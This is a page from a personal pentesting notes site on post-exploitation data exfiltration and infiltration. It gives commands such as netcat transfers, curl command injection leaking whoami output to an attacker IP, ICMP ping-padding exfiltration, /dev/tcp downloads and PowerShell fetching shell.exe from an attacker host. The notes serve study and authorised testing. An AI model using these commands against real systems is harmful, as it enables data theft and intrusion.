📔
Cyber Security Notes
  • Introduction
  • CVEs
    • CVE-2022-33106
  • Paper Reviews
    • Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice
  • Security Basics Notes
    • Identification, Authentication and Authorization
  • Enumeration and Initial Compromise
    • Methodology
    • Footprinting
    • Network Protocols
      • FTP
      • SMB
      • DNS
      • NFS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
    • Nifty One Liners
    • Brute-Force Web Pages
      • Hydra
    • Network Pentest
      • Quick SMB cheatsheet
      • SSH keypair basics
      • Compromise using SSH Key
      • Networking fundamentals Interview topics
      • nmap quick cheatsheet
      • Metasploit Quick Reference
    • Web Pentest
      • Web Pentest Interview top topics
      • Wordpress Exploitation
      • Joomla Exploitation
      • Login Bypass using Cookie Tampering/Poisoning
      • Subdomain Enumeration
      • CSRF mitigation
      • XSS mitigation
      • CSP bypass with JSONP
      • PHP Vulnerabilities
      • Python Serialization Vulnerabilities - Pickle
      • SQL Injections
        • SQLmap
      • SSTI
      • XSS
    • Buffer Overflow Prep
      • Understanding CPUs
      • Virtual Memory and Paging
      • Syscalls
      • Theorem Proving
      • Stripping readable function names
      • Insecure C functions
      • Stack Canaries
      • Linking - GOT,PLT
      • Return Oriented Programming
    • Active Directory - Basics
      • AD DS
      • Managing OUs
      • Group Policies
      • Authentications
      • Trees, Forests and Trusts
      • Kerberos
      • Attacking Kerberos
      • Priv Esc (Post Exploitation)
    • DNS/Domain Enum Masterguide
  • Post Exploitation
    • Shell Escape Techniques
    • Getting stable shell after compromise
    • Linux Privilege Escalation
      • Sudoers file
      • Sudoers entry - Yum
      • Wildcards - Basics
      • Wildcards - Chown
      • Wildcards - Tar
      • Linux Permissions & SUID/SGID/Sticky Bit
      • SUID - nmap
      • SUID - bash
      • SUID - man
      • NFS no_root_squash
      • SUID - pkexec
      • Bad permissions
    • Windows Privilege Escalation
      • SeImpersonatePrivilege Token Impersonation
      • Firefox Creds
      • Potatoes
      • Print Spooler Basics
      • Print Spooler CVE 2020-1030
      • SpoolFool
    • Data Exfiltration Post Exploitation
  • Port Forwarding Cheatsheet
  • Powershell Essentials
    • Powershell Basics
    • Powershell Enumeration
    • Powershell Port Scanner
    • Powershell One Liner Port Scanning
    • Powershell Port Scan in a given CIDR
  • Application Security
    • System Calls in Linux
    • Buffer Overflow Defenses
    • Format string vulnerabilities
    • Sample Github Actions
    • Basic Bugs in Demo Application
    • Using AFL++
  • Linux 64-bit Assembly
    • GDB Basics
      • My relevant GDB cheatsheet
      • Task 1 - Tamper strcmp logic
      • Breakpoints
      • Always starting with intel flavor
      • GDB TUI Mode
    • Basic Hello World Program
    • Registers in 64-bit
    • global directive
    • Reducing instructions and Removing NULL-> Optimizing memory in Assembly
    • Data Types
    • Endianness
    • Moving Data
    • push, pop, and the stack
    • Analysis - Writing data on memory location and referencing
    • Arithmetic Operations
    • Bitwise Logical Operations
    • Bit-Shifting Operations
    • Control Instructions
    • Loops
    • Procedures
    • Stack-Frames and Procedures
    • String Operations
    • Shellcoding basics
      • Introduction and Common Rules
      • Basic Shellcodes->Exit
      • Testing shellcode->Skeleton Code
      • Techniques-> JMP,CALL,POP
      • Techniques-> Stack
      • Techniques-> (64-bit only) RIP Relative Addressing
      • Shellcode 1 -> execve(/bin/sh) STACK PUSH
      • Shellcode 1 -> execve(/bin/sh) JMP CALL POP
      • Techniques-> XOR-Encoder
  • Cloud Security
    • Foundational Technology
    • Learning Through Project Omega
    • IAM Essentials
      • Deep dive into IAM - Part 1
    • Amazon S3
    • Risk Management & Data Controls
    • Enumeration
      • S3 - Enum Basics - PwnedLabs
      • S3 - Identify the AWS Account ID from a Public S3 Bucket
      • EBS - Loot Public EBS Volumes
      • S3- Exploit Weak Bucket Policies for Privileged Access
  • API Security
    • WSDL
  • Reverse Engineering
    • Some string Operations
    • Numbers and Inputs
    • Address inputs
    • Recursive Function
    • Crackme: level1
    • Crackme: level2
    • CTF: Memory Dereferencing
    • CTF: Monty Python
  • CTF Challenge Learnings
    • vsCTF 2024
      • Sanity Check
      • not-quite-caesar
      • Intro to reversing
    • NCL Individual 2024
      • Web Challenges
        • PiratePals
        • Pierre's Store
    • Pico CTF 2024
      • Web Exploitation
        • Bookmarklet
        • WebDecode
        • Unminify
        • Trickster
      • General Skills
        • Commitment Issues
        • Time Machine
        • Blame Game
        • Collaborative Development
        • Binary Search
        • Dont-you-love-banners
    • Sunshine CTF
      • Knowledge Repository
    • Amazon WiCys CTF
      • I am Lazy
      • Password Locker on the Web
      • Happy Birthday Card Generator
      • Bloggergate
      • simple offer
      • Bad Actor
      • Secret Server
      • Simple PCAP
      • Hidden Message
    • C code using getenv()
    • Command Injection with filter
    • Pwning
      • Shoddy_CMP
      • PLT_PlayIT
  • Applied Cryptography
    • Linear Congruential Generator
  • Tools for everything
Powered by GitBook
On this page
  • Using netcat
  • Python HTTP Server
  • SCP (SSH)
  • HTTP Logs
  • Using Ping for Data Exfiltration
  • Data Infiltration
  • FTP
  • /dev/tcp/
  • Powershell.exe

Was this helpful?

  1. Post Exploitation

Data Exfiltration Post Exploitation

Personal discoveries added but majorly derived from: https://raw.githubusercontent.com/RackunSec/Penetration-Testing-Grimoire/master/Post%20Exploitation/data-exfiltration-infiltration.md

PreviousSpoolFoolNextPort Forwarding Cheatsheet

Last updated 1 year ago

Was this helpful?

Using netcat

On the receiving end running,

nc -l -p 1234 > out.file

will begin listening on port 1234.

On the sending end running,

nc -w 3 [destination] 1234 < out.file

will connect to the receiver and begin sending file.

Python HTTP Server

python3 -m http.server 5432

If Python (2.x) is installed on the target system, you can simply start the using the following command in whatever directory that you wish to share temporarily.

www-data@target-system:/etc# python -m SimpleHTTPServer 5432

And this will instantly share the files on the target system in /etc (as you see that is where I started the service) via HTTP on port 5432 You can then use wget recursivley to pull all files found like so, from the attacker machine,

root@attacker-system:~/ctf/target/# wget -r http://(TARGET IP ADDRESS):5432

SCP (SSH)

If SSH is installed on the target system, we can simply use scp to exfiltrate data from the target server onto our attacker machine. First, we need to ensure that SSH is running on the attacker machine to accept the connection and file from the target. Then, we can use the following syntax to transfer the file,

user@target-system:~$ scp -P (PORT OF SSH ON ATTACKER) (FILENAME) \
 (USER ON ATTACKER SYSTEM)@(ATACKER IP ADDRESS):/path/on/attacker/machine.extension

HTTP Logs

If command injection is possible on the target server, but it's not possible to save files anywhere to create a shell (super-unprivileged user), we can use curl in combination with an interpolated command output to make an HTTP request to our local HTTP server on the attacker system as so,

ping 127.0.0.1;curl http://(ATTACKER IP ADDRESS)?username=$(whoami)

Then, in our local HTTP logs, we will see the output of $(whoami) as the username GET request parameter.

Using Ping for Data Exfiltration

To use Ping, we will use the -c arguemnt and specify 16 bytes to pad the ICMP request. First, we will break the file up into 16 byte chunks using xxd like so,

user@target-machine:~$ echo "Hello World. We will be exfiltrating this data." > file.out
user@target-machine:~$ xxd -p -c 16 file.out
48656c6c6f20576f726c642e20576520
77696c6c20626520657866696c747261
74696e67207468697320646174612e0a

Then, we start Wireshark on the attacker machine and listen for ICMP, using the icmp LibPCAP filter. Now, we simply use these 16 byte chunks and pad the ICMP requests to the attacker machine. We can script this like so,

user@target-machine:~$ for bytes in $(xxd -p -c 16 file.out); ping -c 1 -p $bytes (ATTACKER IP ADDRESS); done

In Wireshark, the hexadecimal bytes will be translated into ASCII. This can be cleaned up by using tcpdump on the attacker-machine and parse the ASCII/string output.

Data Infiltration

FTP

/dev/tcp/

This new system allows us to interact with TCP. First, we simply start a listener on our attacker machine and feed it a file as so,

root@attacker-machine:~# nc -lvvp 666 < host-discov.sh

Then, we simply cat the /dev/tcp/ file descriptor for our attacker socket (ip:port) and redirect the output directly into a file or tee as so,

root@nodered:/tmp# cat < /dev/tcp/(ATTACKER IP ADDRESS)/666 > host-discov.sh

Notice the format, /dev/tcp/ then the attacker IP address, and port separated by forward slashes as though it were a simple file.

Powershell.exe

If we have compromised a system and are in a reverse Powershell, we can infiltrate data to the system using the following Powershell commmands,

PS> Invoke-WebRequest -Uri http://(ATTACKER IP):(PORT)/shell.exe -OutFile C:\Users\(TARGET USER)\Desktop\shell.exe

PS 3.0+ has wget and can be called like so,

PS> wget http://(TARGET IP ADDRESS)/shell.exe -OutFile shell.exe

You can use FTP for data infiltration on any OS system if you happen to find it installed on a target machine. Check out for more information on how to infiltrate data and binaries to a target system using FTP.

SimpleHTTPServer
/Post Exploitation/ftp.md